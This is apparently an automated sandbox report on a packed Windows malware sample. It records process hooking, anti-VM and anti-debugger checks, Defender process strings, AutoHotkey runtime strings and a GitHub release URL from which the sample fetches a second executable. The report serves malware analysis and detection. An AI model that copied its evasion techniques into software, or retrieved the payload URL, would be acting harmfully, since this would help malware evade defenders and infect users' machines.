Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static file information: File size 5805568 > 1048576
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x583e00
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
PE file contains sections with non-standard names
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: section name: .vmp0
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: section name: .vmp1
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004C854D push ecx; ret 0_2_004C8560
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004C6E90 push ecx; ret 0_2_004C6EA3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0048D255 push ecx; ret 0_2_0048D268

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1210005 value: E9 2B BA CB 75 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 76ECBA30 value: E9 DA 45 34 8A Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1230008 value: E9 8B 8E CE 75 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 76F18E90 value: E9 80 71 31 8A Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1250005 value: E9 8B 4D 9A 74 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 75BF4D90 value: E9 7A B2 65 8B Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1260005 value: E9 EB EB 9A 74 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 75C0EBF0 value: E9 1A 14 65 8B Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1270005 value: E9 8B 8A D6 73 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 74FD8A90 value: E9 7A 75 29 8C Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1280005 value: E9 2B 02 D8 73 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 75000230 value: E9 DA FD 27 8C Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 12A0005 value: E9 8B 2F C6 75 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 76F02F90 value: E9 7A D0 39 8A Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 12B0007 value: E9 EB DF C8 75 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 76F3DFF0 value: E9 1E 20 37 8A Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: SBIEDLL.DLL
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Binary or memory string: 2SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe RDTSC instruction interceptor: First address: 93D49E second address: 8CBA1C instructions: 0x00000000 rdtsc 0x00000002 shl ch, 0000002Bh 0x00000005 adc ecx, 7E935657h 0x0000000b sub ecx, eax 0x0000000d sub ebp, 00000008h 0x00000013 mov dword ptr [ebp+00h], edx 0x00000017 mov dword ptr [ebp+04h], eax 0x0000001a lea edi, dword ptr [edi-00000004h] 0x00000020 rcl ch, FFFFFF8Eh 0x00000023 sar ch, FFFFFF97h 0x00000026 mov ecx, dword ptr [edi] 0x00000028 stc 0x00000029 jmp 00007F4244B787D5h 0x0000002e xor ecx, ebx 0x00000030 sub ecx, 19337904h 0x00000036 cmc 0x00000037 rol ecx, 02h 0x0000003a clc 0x0000003b xor ecx, 3E167F9Fh 0x00000041 cmp esp, 354D524Dh 0x00000047 jmp 00007F4244D04C72h 0x0000004c not ecx 0x0000004e cmc 0x0000004f test eax, edi 0x00000051 xor ebx, ecx 0x00000053 add esi, ecx 0x00000055 jmp 00007F424507F8A9h 0x0000005a jmp 00007F42448FA6D3h 0x0000005f lea edx, dword ptr [esp+60h] 0x00000063 cmp bp, di 0x00000066 stc 0x00000067 cmp ebp, edx 0x00000069 ja 00007F42450080C9h 0x0000006f push esi 0x00000070 ret 0x00000071 mov ecx, dword ptr [ebp+00h] 0x00000075 rol al, cl 0x00000077 cbw 0x00000079 add ebp, 00000004h 0x0000007f sub eax, 766F1A91h 0x00000084 rdtsc
Tries to evade analysis by execution special instruction (VM detection)
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Special instruction interceptor: First address: 824AAC instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Special instruction interceptor: First address: CE63D6 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004757E0 __fassign,FindFirstFileA,FindClose,FindFirstFileA, 0_2_004757E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0070D95B FindFirstFileA, 0_2_0070D95B
Source: Amcache.hve.0.dr Binary or memory string: VMware
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.0.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.000000000140F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.000000000140F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr Binary or memory string: vmci.sys
Source: Amcache.hve.0.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.0.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr Binary or memory string: VMware20,1
Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Thread information set: HideFromDebugger Jump to behavior
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe System information queried: KernelDebuggerInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Process queried: DebugObjectHandle Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00430B40 _memset,_sprintf,CreateProcessA,CloseHandle,CloseHandle,_memset,SetCurrentDirectoryA,ShellExecuteEx,FormatMessageA, 0_2_00430B40
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004124A0 keybd_event, 0_2_004124A0
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: Shell_TrayWnd
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: @TextLEFTLRIGHTRMIDDLEMX1X2WUWDWLWR{Blind}{ClickLl{}^+!#{}RawTempASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XSCALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uStdOutAllUnreachableClassOverwriteUseEnvLocalSameAsGlobalUseUnsetGlobalUseUnsetLocalYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleMouseTimeIdleKeyboardTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopFileSizeKBLoopFileSizeLoopFileShortPathLoopFileShortNameLoopFilePathLoopFileNameLoopFileLongPathLoopFileFullPathLoopFileExtLoopFileDirLoopFileAttribLoopFieldLineNumberLineFileLastErrorLanguageKeyDurationPlayKeyDurationKeyDelayPlayKeyDelayIsUnicodeIsSuspendedIsPausedIsCriticalIsCompiledIsAdminIs64bitOSIPAddress4IPAddress3IPAddress2IPAddress1InitialWorkingDirIndexIconTipIconNumberIconHiddenIconFileHourGuiYGuiXGuiWidthGuiHeightGuiEventGuiControlEventFormatIntegerFormatFloatExitReasonEventInfoEndCharDesktopCommonDesktopDefaultTreeViewDefaultMouseSpeedDefaultListViewDefaultGuiDDDDDDDDDCursorCoordModeToolTipCoordModePixelCoordModeMouseCoordModeMenuCoordModeCaretControlDelayComputerNameCaretYCaretXBatchLinesAppDataCommonAppDataAhkVersionAhkPathTrueProgramFilesFalseComSpecClipboardAll...%s[%Iu of %Iu]: %-1.60s%sPropertyRegExMatch\:\:REG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefUnicodeHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersLabelTypeCountLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPFuncRemoveClipboardFormatListeneruser32AddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMeRegClassAutoHotkey2Shell_TrayWndCreateWindoweditConsolasLucida Console*ErrorLevel <>=/|^,:*&~!()[]{}+-?."'\;`IFWHILEClass>AUTOHOTKEY SCRIPT<Could not extract script from EXE./*#CommentFlag*/and<>=/|^,:<>=/|^,:.+-*&!?~::?*- Continuation section too long.JoinLTrimRTrimMissing ")"Functions cannot contain functions.Missing "{"Not a valid method, class or property definition.GetSetNot a valid property getter/setter.Hotkeys/hotstrings are not allowed inside functions.IfWin should be #IfWin.+%s%s%sThis hotstring
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: Progman
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.0.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: MsMpEng.exe
OS version to string mapping found (often used in BOTs)
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: WIN_XP
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle\AutoHotkey.exeWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003WIN_2000%04hX0x%Ix*pPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCcFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameApsapi
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: WIN_VISTA
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: WIN_7
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: WIN_8
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: WIN_8.1
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00416C60 DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DeleteObject,DestroyCursor,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,DeleteObject,RemoveClipboardFormatListener, 0_2_00416C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00416E04 DeleteObject,RemoveClipboardFormatListener, 0_2_00416E04
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0041757E RemoveClipboardFormatListener, 0_2_0041757E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00417520 AddClipboardFormatListener,RemoveClipboardFormatListener, 0_2_00417520
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
140.82.121.3
 github.com United States
36459 GITHUBUS false

Contacted Domains

Name IP Active
github.com 140.82.121.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://github.com/abuzgreksi/456/releases/download/456/123.exe false
  • Avira URL Cloud: safe
 unknown